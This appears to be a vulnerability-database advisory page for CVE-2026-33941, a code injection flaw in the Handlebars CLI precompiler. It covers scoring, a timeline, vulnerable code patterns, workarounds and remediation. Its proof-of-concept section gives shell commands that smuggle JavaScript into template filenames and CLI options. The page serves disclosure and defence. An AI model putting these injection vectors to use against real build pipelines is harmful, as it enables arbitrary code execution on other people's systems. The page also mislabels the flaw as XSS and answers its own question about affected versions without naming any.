What is the CVSS score of CVE-2026-33941?

CVE-2026-33941 has a CVSS 3.1 base score of 8.2 (High). CVSS vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H. EPSS exploitation probability: 0.0%.

Which versions of Node.js are affected by CVE-2026-33941?

The Handlebars npm package precompiler contains a critical code injection vulnerability that allows attackers to execute arbitrary JavaScript when template bundles are generated and loaded.. A patch is available.

Node.js CVE-2026-33941

EUVD-2026-16862 HIGH

Cross-site Scripting (XSS) (CWE-79)

2026-03-27 https://github.com/handlebars-lang/handlebars.js

GHSA-xjpj-3mr7-gcpf

XSS Node.js Red Hat Amd

8.2

CVSS 3.1

CVSS VectorNVD

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Attack Vector

Local

Attack Complexity

Low

Privileges Required

Low

User Interaction

Required

Scope

Changed

Confidentiality

High

Integrity

High

Availability

High

Lifecycle Timeline

EUVD ID Assigned

Mar 27, 2026 - 18:30 euvd

EUVD-2026-16862

Analysis Generated

Mar 27, 2026 - 18:30 vuln.today

Patch released

Mar 27, 2026 - 18:30 nvd

Patch available

CVE Published

Mar 27, 2026 - 18:22 nvd

HIGH 8.2

Blast Radius

ecosystem impact

† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth

3 npm packages depend on handlebars (1 direct, 2 indirect)

Ecosystem-wide dependent count for version 4.0.0.

DescriptionNVD

Summary

The Handlebars CLI precompiler (bin/handlebars / lib/precompiler.js) concatenates user-controlled strings - template file names and several CLI options - directly into the JavaScript it emits, without any escaping or sanitization. An attacker who can influence template filenames or CLI arguments can inject arbitrary JavaScript that executes when the generated bundle is loaded in Node.js or a browser.

Description

lib/precompiler.js generates JavaScript source by string-interpolating several values directly into the output. Four distinct injection points exist:

1. Template name injection

javascript

// Vulnerable code pattern
output += 'templates["' + template.name + '"] = template(...)';

template.name is derived from the file system path. A filename containing " or ']; breaks out of the string literal and injects arbitrary JavaScript.

2. Namespace injection (`-n` / `--namespace`)

javascript

// Vulnerable code pattern
output += 'var templates = ' + opts.namespace + ' = ' + opts.namespace + ' || {};';

opts.namespace is emitted as raw JavaScript. Anything after a ; in the value becomes an additional JavaScript statement.

3. CommonJS path injection (`-c` / `--commonjs`)

javascript

// Vulnerable code pattern
output += 'var Handlebars = require("' + opts.commonjs + '");';

opts.commonjs is interpolated inside double quotes with no escaping, allowing " to close the string and inject further code.

4. AMD path injection (`-h` / `--handlebarPath`)

javascript

// Vulnerable code pattern
output += "define(['" + opts.handlebarPath + "handlebars.runtime'], ...)";

opts.handlebarPath is interpolated inside single quotes, allowing ' to close the array element.

All four injection points result in code that executes when the generated bundle is require()d or loaded in a browser.

Proof of Concept

Template name vector (creates a file pwned on disk):

bash

mkdir -p templates
printf 'Hello' > "templates/evil'] = (function(){require(\"fs\").writeFileSync(\"pwned\",\"1\")})(); //.handlebars"

node bin/handlebars templates -o out.js
node -e 'require("./out.js")'
# Executes injected code, creates ./pwned

Namespace vector:

bash

node bin/handlebars templates -o out.js \
  -n "App.ns; require('fs').writeFileSync('pwned2','1'); //"
node -e 'require("./out.js")'

CommonJS vector:

bash

node bin/handlebars templates -o out.js \
  -c 'handlebars"); require("fs").writeFileSync("pwned3","1"); //'
node -e 'require("./out.js")'

AMD vector:

bash

node bin/handlebars templates -o out.js -a \
  -h "'); require('fs').writeFileSync('pwned4','1'); // "
node -e 'require("./out.js")'

Workarounds

Validate all CLI inputs before invoking the precompiler. Reject filenames and option values that contain characters with JavaScript string-escaping significance (", ', ;, etc.).
Use a fixed, trusted namespace string passed via a configuration file rather than command-line arguments in automated pipelines.
Run the precompiler in a sandboxed environment (container with no write access to sensitive paths) to limit the impact of successful exploitation.
Audit template filenames in any repository or package that is consumed by an automated build pipeline.

AnalysisAI

The Handlebars npm package precompiler (bin/handlebars) allows arbitrary JavaScript injection through unsanitized string concatenation in four distinct code paths: template filenames, namespace option (-n), CommonJS path option (-c), and AMD path option (-h). Attackers who can control template filenames or CLI arguments can inject code that executes when the generated JavaScript bundle is loaded in Node.js or browser environments. …

RemediationAI

Within 24 hours: identify all projects using Handlebars precompiler (bin/handlebars) by scanning package-lock.json and yarn.lock files; immediately restrict build system access and audit recent build logs for suspicious template filenames or CLI arguments. Within 7 days: update Handlebars to the patched version (confirm exact patched version from npm registry or vendor advisory); rebuild all affected template bundles in isolated, monitored environments; audit generated JavaScript for injected code patterns. …

Analysis

Detailed AI-generated intelligence summary covering attack vector, impact assessment, affected versions, remediation steps, and indicators of compromise.

POChttps://••••••••••.com/exploit

PATCHhttps://••••••••••.com/patch

ADVISORYhttps://••••••••••.com/advisory